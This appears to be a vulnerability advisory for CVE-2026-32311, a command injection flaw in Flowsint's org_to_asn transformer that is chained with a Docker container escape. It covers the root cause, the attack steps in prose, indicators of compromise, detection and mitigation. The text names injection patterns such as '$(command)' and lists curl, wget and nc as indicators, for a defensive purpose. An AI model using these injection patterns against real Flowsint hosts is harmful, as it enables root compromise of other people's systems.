CVE-2026-32311 Overview
CVE-2026-32311 is a critical command injection vulnerability in Flowsint, an open-source OSINT (Open Source Intelligence) graph exploration tool used for cybersecurity investigations, transparency research, and verification workflows. The vulnerability exists in the org_to_asn transformer functionality, which fails to properly sanitize user-controlled input before executing shell commands. A remote attacker can exploit this flaw to execute arbitrary operating system commands as root on the host machine through shell metacharacter injection combined with a Docker container escape technique.
Critical Impact
Remote attackers can achieve full system compromise by executing arbitrary commands as root on the host machine, bypassing Docker container isolation through the vulnerable transformer functionality.
Affected Products
- Reconurge Flowsint (versions prior to commit b52cbbb904c8013b74308d58af88bc7dbb1b055c)
Discovery Timeline
- 2026-04-20 - CVE-2026-32311 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2026-32311
Vulnerability Analysis
This vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), commonly known as OS Command Injection. The flaw exists within Flowsint's transformer architecture, specifically in the org_to_asn transform function that processes organization nodes within investigation sketches.
Flowsint allows users to create investigations containing sketches with controllable graphs composed of nodes and relationships. These nodes store OSINT target information such as usernames, websites, and organizational data. When a user triggers the org_to_asn transformer on an organization node, the application passes node data to system shell commands without adequate sanitization of shell metacharacters.
The attack chain is particularly severe because it not only achieves command injection but also facilitates a Docker container escape, allowing attackers to break out of the containerized environment and execute commands directly on the underlying host system with root privileges.
Root Cause
The root cause of CVE-2026-32311 is the lack of input validation and sanitization in the org_to_asn transformer when constructing shell commands. User-supplied data from organization nodes is concatenated directly into command strings without escaping or filtering shell metacharacters (such as ;, |, &, $(), and backticks). This allows attackers to inject additional commands that execute with the privileges of the running process.
The container escape component suggests that the Docker configuration grants excessive privileges to the container, potentially through privileged mode, host volume mounts, or exposed Docker socket, enabling attackers to pivot from container compromise to full host control.
Attack Vector
The attack is network-accessible and requires no authentication or user interaction. An attacker can exploit this vulnerability by:
- Creating an investigation within Flowsint
- Adding a sketch containing an organization node with malicious shell metacharacters in the node data
- Triggering the org_to_asn transformer on the crafted organization node
- The injected commands execute within the container context
- Leveraging container misconfiguration to escape to the host system and execute commands as root
The vulnerability mechanism involves shell metacharacter injection in the transformer's command construction. When the org_to_asn transformer processes an organization node, it constructs a shell command using the node's data. By including shell metacharacters such as $(command) or ; command ; in the organization name or related fields, an attacker can break out of the intended command context and execute arbitrary code. For detailed technical analysis, refer to the GitHub Security Advisory GHSA-9g44-8xv2-f2m9.
Detection Methods for CVE-2026-32311
Indicators of Compromise
- Unexpected process spawning from the Flowsint application container, particularly shells (/bin/sh, /bin/bash) or system utilities (wget, curl, nc)
- Organization nodes containing shell metacharacters or encoded command sequences in investigation data
- Unusual network connections originating from the Flowsint container to external command and control infrastructure
- Evidence of Docker socket access or privilege escalation attempts within container logs
Detection Strategies
- Monitor application logs for org_to_asn transformer executions with suspicious organization names containing special characters
- Implement behavioral analysis to detect anomalous process trees originating from the Flowsint container
- Deploy runtime container security monitoring to identify container escape attempts and unexpected privilege escalation
- Use web application firewalls to inspect and block requests containing shell metacharacters targeting the transformer endpoints
Monitoring Recommendations
- Enable comprehensive logging for all transformer operations within Flowsint
- Configure container runtime security tools to alert on any processes spawning outside the expected application behavior
- Implement network segmentation and monitor for lateral movement attempts from the Flowsint host
- Review Docker daemon logs for container escape indicators and privileged operation attempts
How to Mitigate CVE-2026-32311
Immediate Actions Required
- Update Flowsint to a version containing commit b52cbbb904c8013b74308d58af88bc7dbb1b055c or later immediately
- If immediate patching is not possible, disable or restrict access to the org_to_asn transformer functionality
- Review existing investigations and sketches for any suspicious organization nodes containing shell metacharacters
- Audit Docker container configurations to remove privileged access and unnecessary capabilities
Patch Information
The vulnerability has been addressed in commit b52cbbb904c8013b74308d58af88bc7dbb1b055c. This commit removes or refactors the vulnerable code that allowed unsanitized input to reach shell command execution. Organizations should update their Flowsint installations to include this commit. For detailed patch information, see the GitHub Commit Update and the GitHub Security Advisory GHSA-9g44-8xv2-f2m9.
Workarounds
- Restrict network access to the Flowsint application to trusted users and IP ranges only
- Disable the org_to_asn transformer if it is not required for your investigation workflows
- Run the Flowsint container with minimal privileges, removing --privileged flag and dropping unnecessary Linux capabilities
- Implement network-level controls to prevent the container from initiating outbound connections to untrusted destinations
# Docker security hardening example
# Run Flowsint container with reduced privileges
docker run --rm \
--cap-drop=ALL \
--security-opt=no-new-privileges:true \
--read-only \
--network=flowsint-internal \
flowsint:latest
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
